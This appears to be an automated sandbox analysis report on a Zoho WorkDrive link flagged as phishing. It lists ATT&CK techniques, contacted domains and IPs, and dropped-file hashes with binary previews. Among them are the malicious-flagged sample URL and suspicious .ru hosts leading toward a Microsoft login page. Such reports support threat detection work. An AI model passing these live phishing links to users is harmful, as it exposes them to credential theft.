Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f40%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
customer-wms.zoho.com
136.143.190.75
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      zpublic-h2.zohopublic.com
      136.143.191.16
      truefalse
        unknown
        code.jquery.com
        151.101.2.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                sni1gl.wpc.omegacdn.net
                152.199.21.175
                truefalse
                  high
                  h2-stratus.zohocdn.com
                  89.36.170.147
                  truefalse
                    high
                    www.google.com
                    142.250.184.228
                    truefalse
                      high
                      yolito.xomivarne.ru
                      172.67.207.119
                      truefalse
                        unknown
                        j3aziewrw1iysjb7r2eip84ech8dxg8q5ot1uitirck9qncxvuobqqw.sprocubseq.ru
                        104.21.60.111
                        truefalse
                          unknown
                          www.office.com
                          unknown
                          unknownfalse
                            high
                            css.zohocdn.com
                            unknown
                            unknownfalse
                              high
                              aadcdn.msftauth.net
                              unknown
                              unknownfalse
                                high
                                wms.zohopublic.com
                                unknown
                                unknownfalse
                                  unknown
                                  js.zohocdn.com
                                  unknown
                                  unknownfalse
                                    high
                                    identity.nel.measure.office.net
                                    unknown
                                    unknownfalse
                                      high
                                      login.microsoftonline.com
                                      unknown
                                      unknownfalse
                                        high
                                        static.zohocdn.com
                                        unknown
                                        unknownfalse
                                          high
                                          workdrive.zohopublic.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4true
                                              unknown
                                              https://yolito.xomivarne.ru/uBWuCBti/false
                                                unknown
                                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                  unknown
                                                  https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    13.107.6.156
                                                    unknownUnited States
                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    13.107.246.45
                                                    s-part-0017.t-0009.t-msedge.netUnited States
                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    172.217.18.14
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.18.94.41
                                                    challenges.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.21.60.111
                                                    j3aziewrw1iysjb7r2eip84ech8dxg8q5ot1uitirck9qncxvuobqqw.sprocubseq.ruUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    142.250.185.106
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    40.126.31.71
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    216.58.206.35
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    64.233.166.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    172.67.207.119
                                                    yolito.xomivarne.ruUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    2.19.126.143
                                                    unknownEuropean Union
                                                    16625AKAMAI-ASUSfalse
                                                    142.250.186.131
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    151.101.194.137
                                                    unknownUnited States
                                                    54113FASTLYUSfalse
                                                    35.190.80.1
                                                    a.nel.cloudflare.comUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.184.228
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    13.69.239.74
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    142.250.186.78
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    1.1.1.1
                                                    unknownAustralia
                                                    13335CLOUDFLARENETUSfalse
                                                    136.143.191.16
                                                    zpublic-h2.zohopublic.comUnited States
                                                    2639ZOHO-ASUSfalse
                                                    104.18.95.41
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    40.126.32.72
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    89.36.170.147
                                                    h2-stratus.zohocdn.comSwitzerland
                                                    41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHfalse
                                                    151.101.2.137
                                                    code.jquery.comUnited States
                                                    54113FASTLYUSfalse
                                                    142.250.186.106
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    20.50.73.4
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    239.255.255.250
                                                    unknownReserved
                                                    unknownunknownfalse
                                                    40.126.32.68
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    136.143.190.75
                                                    customer-wms.zoho.comUnited States
                                                    2639ZOHO-ASUSfalse
                                                    104.17.25.14
                                                    cdnjs.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    IP
                                                    192.168.2.16
                                                    192.168.2.23
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1586113
                                                    Start date and time:2025-01-08 18:30:50 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Sample URL:https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:13
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal48.phis.win@22/119@52/281
                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.186.78, 64.233.166.84, 216.58.206.46
                                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • VT rate limit hit for: https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 16:31:22 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2673
                                                    Entropy (8bit):3.9889033750344107
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F998827D439D97A6CBE3193256D0B426
                                                    SHA1:D8F2C11CFEB77A2181D66EBE3D180B53D3798AD0
                                                    SHA-256:F4AA353B12176C1C61EBF0A08BB566E1BF8BE2A1B30DB0F4012862E79A7F1FE6
                                                    SHA-512:BDE5BCB148A2B355820D28F47179BCE0492DB8391FF8BBFD4F45AA5338B095100C758B7DC70625472B30D44093F3F071288EF329FEEC6EC2825DB6E46EA5C21A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.....=.".a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 16:31:22 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2675
                                                    Entropy (8bit):4.007780254327836
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:65BF6FF024B0F7601B4093B1DE98BB0A
                                                    SHA1:19EA22B74AFBE9CD6B9658BAF46411176C2D71DC
                                                    SHA-256:C010A092A78D04734A7E91A01311713745FF57BD81458160F1EF210E9DD88B5C
                                                    SHA-512:B7DE57B59DBCAA6F2937464E94A48FAC90858B1D476353D09A9CF89048A612A5FCDCF0C40BA8FB041097A3275020A4750D07E7B83B608FF6AD00A54997B5DB30
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.......".a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2689
                                                    Entropy (8bit):4.015519763845106
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2BE6D1158C5C1BC9A3429A87CA4A81EF
                                                    SHA1:0873B445D5BAA92B56FF26069665E14848902FFC
                                                    SHA-256:BF63BE58176A8F7FDF999A59F7D0A508DD1FD521C8E64802C1CAC3ED94CD3E85
                                                    SHA-512:C202AC3FAF856C39FB37E731CE75FDDEB5145686BCA357A41E3A6818E3332A246EFD1D90AFF36173E72502E26F7D6934A9C60B09CEEC20F83A9AD352BFE10F76
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 16:31:22 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2677
                                                    Entropy (8bit):4.003396155989199
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C6BCFF071DB51EDB8AB4E89EA25874A3
                                                    SHA1:54BADB1A4D09CA297594F6E1C1C2FAA3550B3842
                                                    SHA-256:CEB3613A90377E8382814F32549E8F1E2BE829549BECD3D38B53F0A9C89041AF
                                                    SHA-512:3321DD178FBCEA8137C34B220A43AE4F7D9710E73D0A907183639227235E77843A2870ED97A9AAC8B49BD360D9A835D60DA0C9D40AEFB57710579F0C20DE41AB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,....t7.".a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 16:31:22 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2677
                                                    Entropy (8bit):3.993257852623564
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:45B9D91C9DB2AFC0E32857AF6A05FED4
                                                    SHA1:9ACE68E2E87F206C48442065A0B41EFDE954A4DD
                                                    SHA-256:2DF0FC68252B0E47A784F7B3643C6BB0E2125375AD6D1E0A5BE1B29EC8C0BCDE
                                                    SHA-512:12EAD6431E203EEF6316D304DB3EB159574F3FBBDB3119065F098180D6B4FDF6028AEBC62A51F144B16074C226A45003D738AD78D4494A3262468960C92B3D22
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.......".a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 16:31:22 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2679
                                                    Entropy (8bit):4.003436096976702
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B8FD7C1F03576E10F28858454E15E49D
                                                    SHA1:F2D4D87C68786721F20E57CB2E88399F0C876747
                                                    SHA-256:5C7CD9A9E64F8DF381ED91A89C397E88405027C2608A157896DAB23C70278A33
                                                    SHA-512:374ED33A2230FFB1A67A4C6BBDE3F048973246AAEE6688E0DB3DD850596B33A8866A96D741D491244F127835192F6391F859FD87444832E94448856C88A71AEB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,...."..".a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):48316
                                                    Entropy (8bit):5.6346993394709
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                    Category:downloaded
                                                    Size (bytes):61052
                                                    Entropy (8bit):7.996159932827634
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                    SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                    SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                    SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                    Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):305885
                                                    Entropy (8bit):5.848159614277568
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:752982D241B86E65611472D4A5DDD5A5
                                                    SHA1:9D53C6574EDB57312C5809466618AA9DCEC39782
                                                    SHA-256:711926109A7C2B1985644F9A4778440643E39E03776DC76ECB9BE50E28B019F3
                                                    SHA-512:B670BCA020B1F2D4BD36185CA8366137D7F9D4E9A7D26194AAAF9320050E18E919DEA7A4CA24D57FB055C8F5E4B261442026095A9EF5EB5B50054A85460CF60E
                                                    Malicious:false
                                                    Reputation:unknown
